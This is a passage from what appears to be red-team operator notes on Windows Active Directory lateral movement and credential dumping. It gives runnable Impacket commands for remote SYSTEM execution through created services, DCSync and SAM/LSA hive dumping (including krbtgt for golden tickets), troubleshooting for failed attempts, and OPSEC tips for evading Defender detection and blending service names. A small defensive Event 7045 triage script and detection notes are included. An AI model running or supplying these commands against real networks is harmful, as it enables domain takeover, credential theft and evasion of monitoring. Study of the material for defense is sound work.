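  svc_run_as_system "${1}Launcher" "sc create $1 binPath= C:\\Windows\\System32\\cmd.exe" || return 2
  if svc list | grep -qi "$1"; then
    svc delete -name "$1" >/dev/null 2>&1 || true
    echo exec-confirmed
  else
    echo exec-unconfirmed
    return 1
  fi
}

# Separate "delivered and exited" from "launched but still blocking" (e.g. a \\attacker\share
# probe with egress filtered) by the state SCM reports for the service.
svc_status_class() {  # $1 = service name
  case "$(svc status -name "$1" | grep -oiE 'START_PENDING|RUNNING|STOPPED' | head -n 1)" in
    START_PENDING) echo launched-hanging ;;
    STOPPED)       echo ran-and-exited ;;
    RUNNING)       echo running ;;
    *)             echo unknown; return 1 ;;
  esac
}

# Usage (real run):
#   export SVC_TARGET=srv01.corp.local
#   svc_prove_system_exec ProofMarker                        # prints exec-confirmed / exec-unconfirmed
#   svc_run_as_system EgChk 'dir \\10.0.0.9\pub'; svc_status_class EgChk
```

Track every name you hand to svc_run_as_system; the cleanup loop in section 7 is only as complete as that list.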


3. Exec-method selection — what to reach for (and why others failed)

Tool         Transport / needs                                    Verdict in this run
services.py  SCM via \PIPE\svcctl on IPC$ (135/445)               WORKED: no admin share needed
psexec.py    uploads service binary to ADMIN$/C$, then SVCCTL     FAILED: STATUS_BAD_NETWORK_NAME (shares off)
smbexec.py   per-command service, output to a writable share      FAILED: same share dependency
wmiexec.py   DCOM IWbemServices (135 + ephemeral port)            FAILED: Can't find a valid stringBinding (DCOM/cluster)
atexec.py    Task Scheduler via \PIPE\atsvc on IPC$               share-independent alternative; try when SCM start is denied
dcomexec.py  DCOM (MMC20/ShellWindows), 135 + ephemeral port      same DCOM constraints as wmiexec
psexec.py  -k -no-pass <TARGET_FQDN>                                              # SYSTEM via service binary on ADMIN$ — dies if admin shares disabled
smbexec.py -k -no-pass <TARGET_FQDN>                                              # semi-interactive; also needs a writable share for output
wmiexec.py -k -no-pass <TARGET_FQDN>                                             # DCOM+WMI, often dodges the admin-share requirement (135 + RPC ephemeral)
atexec.py  -k -no-pass <TARGET_FQDN> 'whoami'                                     # scheduled-task exec over IPC$ (no admin share) — good fallback to services.py
dcomexec.py -k -no-pass -object MMC20 <TARGET_FQDN> 'whoami'                      # DCOM MMC20.Application exec

Pick by open ports + what shares exist. Shares off ⇒ start with services.py/atexec (IPC$ only). DCOM tools need the RPC ephemeral range reachable and the OXID-resolver bindings to be routable — on a cluster they came back as node names/VIPs on a high dynamic port (e.g. …[63879]) that wasn't reachable, hence StringBinding chosen: None.


4. secretsdump — local hives & DCSync

# DCSync — replication via DRSUAPI (\PIPE\drsuapi over IPC$). MUST target a DOMAIN CONTROLLER.
secretsdump.py -k -no-pass -just-dc <DOMAIN>/<USER>@<DC_FQDN>                      # all domain hashes via DRS
secretsdump.py -k -no-pass -just-dc-user '<DOMAIN>\krbtgt' <DC_FQDN>              # single principal (krbtgt then golden-ticket key)
secretsdump.py -k -no-pass -just-dc-ntlm -dc-ip <DC_IP> <DOMAIN>/<USER>@<DC_FQDN> # NTLM only, faster
# Remote host secrets (SAM + LSA secrets + cached creds) — note: staging the reg-save needs a writable ADMIN$
secretsdump.py -k -no-pass <DOMAIN>/<USER>@<TARGET_FQDN>                          # SAM/LSA/cached over winreg; FAILS the same way if admin shares are disabled
# Offline LOCAL hives (when you can pull SYSTEM/SAM/SECURITY off the box another way)
reg save HKLM\SYSTEM C:\Users\Public\sy & reg save HKLM\SAM C:\Users\Public\sa & reg save HKLM\SECURITY C:\Users\Public\se   # run as SYSTEM via services.py
secretsdump.py -sam sa -system sy -security se LOCAL                              # parse the saved hives offline then local NT hashes + LSA secrets

DCSync against a member server fails ept_s_not_registered — the DRSUAPI endpoint isn't registered on non-DCs. The error means "wrong host class," not "wrong creds." Re-point at an actual DC (-dc-ip <DC_IP> / <DC_FQDN>). Likewise, remote SAM/LSA dump needs the admin share to stage the hive save — disabled shares break it too; only the DRS path (-just-dc, DC-only) rides pure IPC$.


5. What Went Wrong

  • psexec/smbexec → SMB SessionError: code: 0xc00000cc - STATUS_BAD_NETWORK_NAME on ADMIN$, C$, D$ in turn ([-] share 'ADMIN$' is not writable). Cause: admin shares disabled on the host. Fix: switch to services.py (SCM/IPC$) or atexec (atsvc/IPC$) — neither needs a writable share.
  • services.py start → SCMR SessionError: code: 0x3 - ERROR_PATH_NOT_FOUND. binPath referenced a file that didn't exist yet (the download had been blocked) or used a bare cmd. Fix: full path C:\Windows\System32\cmd.exe /c …, and don't depend on a prior download landing.
  • services.py start → DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied. SCM create succeeded but start was refused — start right not granted to that ticket on that service. Fix: re-mint the ticket with the right impersonated principal, or pivot to atexec.
  • Non-service binary → START_PENDING / 0x41d ERROR_SERVICE_REQUEST_TIMEOUT. Expected: a cmd /c payload never answers the SCM handshake. It still executed — confirm with a marker, don't read it as failure.
  • wmiexec.py → Can't find a valid stringBinding to connect (StringBinding chosen: None). DCOM OXID resolver returned cluster node names / VIPs on a high ephemeral port that wasn't routable. On clustered targets prefer the SCM/IPC$ path.
  • secretsdump … -just-dc-user → ept_s_not_registered. Target was a member server; DRSUAPI lives only on DCs. DCSync a DC instead.
  • MDE blocked delivery behaviors (certutil download-and-run, net share) but NOT the service-create SYSTEM exec. The detection was behavioral on the LOLBin, not static on the payload — a pre-staged non-LOLBin binary launched by the service ran. Document this as a detection-vs-prevention gap, not as "exec blocked."
  • KRB_AP_ERR_MODIFIED when impersonating Administrator/Tier-0 during S4U2self — Protected Users / "sensitive, cannot be delegated." Use a non-protected privileged service account.

6. Detection / OPSEC

  • Service create/start = Event 7045 (System log, new service) and 4697 (Security log, service installed; needs the Security System Extension audit subcategory), plus 4688/MDE DeviceProcessEvents for the cmd.exe/child. The marker-service trick doubles the 7045 noise (one per service). Keep names boring/IT-flavored ("Health Check", "Monitor").
  • secretsdump -just-dc = DRSUAPI DRSGetNCChanges → Event 4662 on the DC with the replication control-access GUIDs in Properties (DS-Replication-Get-Changes 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2, DS-Replication-Get-Changes-All 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2) from a non-DC source, and a likely DCSync alert in Defender for Identity. Scope to -just-dc-user to minimize replication volume.
  • Kerberos-only (-k -no-pass) avoids NTLM auth events but leaves 4769 TGS requests for the impersonated SPN.
  • DCOM/WMI exec lights up DeviceNetworkEvents on the ephemeral RPC port; SCM/IPC$ is comparatively quiet (one pipe, 445).
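The 7045 point above as detection logic you can run over an export: an added example, not part of the page and not a vendor rule. It reads a constructed pipe-delimited export of System-log events (timestamp|EventID|host|ServiceName|ImagePath|StartType|Account; that row layout is an assumption about how the log was exported) and flags service installs whose binary is an interpreter invocation (the cmd.exe /c pattern from section 1) or lives in a user-writable directory (the psexec-style dropped binary). EVT_SAMPLE is constructed, not real telemetry.

```shell
# Constructed sample export of System-log service events (not real telemetry).
EVT_SAMPLE='2024-05-01T10:01:02Z|7045|SQL01|MsSense|"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"|auto start|LocalSystem
2024-05-01T10:02:30Z|7036|SQL01|OracleServiceORCL|running||
2024-05-01T10:03:44Z|7045|SQL01|HealthChk|C:\Windows\System32\cmd.exe /c sc create ProofMarker binPath= C:\Windows\System32\cmd.exe|demand start|LocalSystem
2024-05-01T10:03:45Z|7045|SQL01|ProofMarker|C:\Windows\System32\cmd.exe|demand start|LocalSystem
2024-05-01T10:05:10Z|7045|SQL01|svcTmp1|C:\Windows\TEMP\kJhGfDsA.exe|demand start|LocalSystem
2024-05-01T10:09:00Z|7045|SQL01|OracleJobScheduler|C:\app\oracle\product\19\bin\extjob.exe|auto start|NT AUTHORITY\NETWORK SERVICE'

# Flag 7045 rows whose ImagePath is an interpreter invocation or a binary in a writable directory.
# Output columns: timestamp host service reason
svc_install_triage() {
  awk -F'|' '$2 == 7045 {
    path = tolower($5)
    reason = ""
    # interpreter as the service binary: cmd.exe /c ..., powershell -enc ..., script hosts
    if (path ~ /(cmd|powershell|pwsh|wscript|cscript|mshta|rundll32)\.exe([^a-z0-9]|$)/)
      reason = "interpreter-as-service"
    # dropped binary in a location a remote tool or a non-admin can write to
    else if (path ~ /\\(temp|users\\public|programdata)\\/)
      reason = "binary-in-writable-dir"
    if (reason != "") print $1, $3, $4, reason
  }'
}

# Usage: export the System log in this layout and pipe it in; against the embedded sample:
printf '%s\n' "$EVT_SAMPLE" | svc_install_triage
```

The same two tests applied to 4697 rows catch the marker trick twice (launcher and marker) and the psexec upload once; a legitimate installer writing a signed binary under Program Files produces no line.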

7. Cleanup (this technique leaves services + files)

  • Delete every service you created — track the names as you go. Anything left behind is both an artifact and a re-exec foothold:
    for s in HealthChk ProofTest ProofMarker EgChk <other-marker-names>; do services.py -k -no-pass <TARGET_FQDN> delete -name "$s"; done   # remove all created/marker services
    services.py -k -no-pass <TARGET_FQDN> list | grep -iE 'HealthChk|Proof|EgChk'    # verify none remain
    
  • Remove staged binaries/scripts you dropped (C:\Users\Public\*.exe, *.txt, x.js, *.sct, *.hta) and any reg save hive files (C:\Users\Public\sy|sa|se).
  • Revert any ACE/RBCD/KeyCredentialLink writes used to get the ticket. Clear local ccaches when done.

8. References

  • Impacket (Fortra): https://github.com/fortra/impacket — examples/services.py, psexec.py, smbexec.py, wmiexec.py, atexec.py, dcomexec.py, secretsdump.py
  • The Hacker Recipes — lateral movement / SCM & WMI exec: https://www.thehacker.recipes/ad/movement/lateral-movement-and-credential-dumping
  • The Hacker Recipes — DCSync: https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync
  • harmj0y — "Mimikatz DCSync" / DRSUAPI background: https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
  • MS-SCMR (SCM Remote Protocol) and MS-DRSR (DRSUAPI) protocol docs (Microsoft Open Specifications) for the exact RPC opnums behind the error codes above.